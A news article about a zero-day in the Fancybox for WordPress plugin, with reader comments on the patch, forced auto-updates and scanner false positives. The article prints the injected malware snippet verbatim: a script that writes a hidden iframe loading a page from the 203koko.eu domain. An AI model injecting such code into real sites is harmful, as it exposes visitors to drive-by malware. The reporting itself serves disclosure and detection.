Zero Day Vulnerability Discovered in Fancybox for WordPress Plugin

Four hours ago, users seeking support on WordPress.org reported malware injected into their sites from an unknown source. The vulnerability allows for an iframe to be injected, redirecting to a “203koko” site.

<script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>');}/*]]>*/</script>

After working together to determine the plugins they have in common, users identified Fancybox for WordPress as the culprit. It has since been temporarily removed from the WordPress Plugins Directory, as it hasn’t been updated for two years and poses a security threat to users. The plugin has received more than half a million downloads and is likely in use on thousands of WordPress sites.

Konstantin Kovshenin and Gennady Kovshenin worked together to analyze sites from affected users to confirm the vulnerability. There is currently no patch, so users of the plugin are advised to turn it off immediately.

Analysts at Sucuri have confirmed via Website Firewall logs that the vulnerability is being actively exploited:

After some analysis, we can confirm that this plugin has a serious vulnerability that allows for malware (or any random script/content) to be added to the vulnerable site. Because it is currently unpatched, we will not disclose more information.

What makes things worse, is that it’s being actively exploited in the wild, leading to many compromised websites.

Users who have this plugin installed on their sites have no other option than to disable it, as no patch is available yet. The plugin’s author, José Pardilla, is aware of the issue and responded to an affected user five hours ago in the plugin’s forum on WordPress.org. A patch should be forthcoming.

18 Comments


  1. Thank you Sarah! I have the odd feeling this might be affecting themes with fancybox built in as well.

    By the way, I think Google is going to flag the email version of this article… and maybe the article itself… for containing that code. Gmail gave me a nastygram about it.

    Report


    1. Thanks for mentioning that – I didn’t think of how it might be handled via emails, will keep that in mind for the future.

      Report


  2. In case there is any confusion here, this appears to be a flaw in the FancyBox for WordPress plugin, not in FancyBox itself. which is just a jQuery plugin.

    Report


    1. In case there is any confusion here, this appears to be a flaw in the FancyBox for WordPress plugin, not in FancyBox itself. which is just a jQuery plugin.

      That seems to be a widespread misunderstanding as I’m getting some questions about security of my plugin (Easy FancyBox) because of this… Hope it is clear this particular vulnerability does not necessarily concern other FancyBox plugins.

      Report


  3. Thanks for letting everyone know about this, we have been busily checking all our sites to see if any use it, but it would be nice if the WordPress plugin repository gave an indication of why it was pulled (for anyone stumbling upon it), and even sites using it, send a notice to the plugin menu like an upgrade notification.

    Report


  4. The author has already pushed out a newer version 3.0.3. In the changelog it reflects the needed fixes. “3.0.3 Fixed a security issue. (Thanks to mickaelb for reporting and Konstantin Kovshenin for providing the fix).

    Report


  5. The plugin was updated a few hours ago with v3.0.3, fixing for the vulnerability.

    Apologies to everyone for the inconveniences caused.

    Report


  6. I had 4 sites with this plugin… is there any way to check if the site was already exploited?

    Interesting, but my logs show that Fancybox update was pushed from WP.org (that means it was installed automatically without my interaction). I didn’t know about this WP feature, or is it some kind of “last resort” feature that only gets used once in a while?

    Report


  7. If you are using a caching plugin you may have cached pages with the iframe injected.

    Report


  8. You can clear cache to be sure as nicola mentioned and check the source code of your site inside your head tag. The malicious code was injected near the line that reads ““, and it looked like the code mentioned at the beginning of this article.

    The auto update was set on automatic mode by the WP.org security team to help mitigate the effects of the vulnerability. The version that WP.org is auto-updating to fixes the issue and changes the name of the setting where the malicious code was stored, so if your site got infected, the update should clear it.

    Report


      1. I’m not entirely sure how it works but to my understanding Auto Updates for plugins and themes are a (disabled by default) built-in feature on WordPress installations. The Security team can override this and force an update for a particular plugin if they decide it’s worth doing so, such as in this case, or when the Jetpack vulnerability was found last year.

        The link you posted describes how to enable these auto-updates on your own WordPress installation if desired, although normally this shouldn’t be necessary, since manually updating them gives you a better chance at testing and checking the update doesn’t break them, or at least find out it that happens.

        Report


  9. There are some other plugins on WordPress.com that use FancyBox such as “Easy FancyBox” and “FancyBox” I know that @RyanHellyer said that this affects the plugin “Fancybox for WordPress” so if I don’t have this particular plugin installed should I still be concerned? Thanks in advance.

    Report


    1. Its not in the fancybox javascript. It is only in this plugin because of a coding issue in its settings.

      Report


  10. Administrators who had the vulnerable version of this plugin installed should also consider resetting their user sessions and credentials. The patch issued yesterday closes the exploit vector within the plugin, but depending on how an attacker chose to exploit the vulnerability, it could have lead to compromised user credentials or arbitrary code execution in the admin panel (this would have been a separate attack than the iframe being reported here).

    Report


  11. Also note to those of you who are using Wordfence, they’re currently scanning files for the 203koko URL and reporting it as a threat. However caching plugins like WTC will cache blogrolls and Dashboard news feeds. This article was features in the news feed and contains the 203koko URL in the body. This content is being cached to flatfiles which are scanned by Wordfence. Such cases are false positives.

    Report


  12. I had the same warning via wordfence, but was not using fancybox! seems your live link in this post gave wordfence a false positive as the link was showing up in wordpress news section might be an idea to remove actual link? Thanks to Gennady Kovshein for clearing this up for my particular case! Hope this helps others before they go ahead & delete server files to re install like I just have :(

    Report


    1. I think it’s Wordfence’s fault for an incorrect detection signature. WPTavern has all the freedom it wants to post any links on especially as text (unclickable).

      Report

Comments are closed.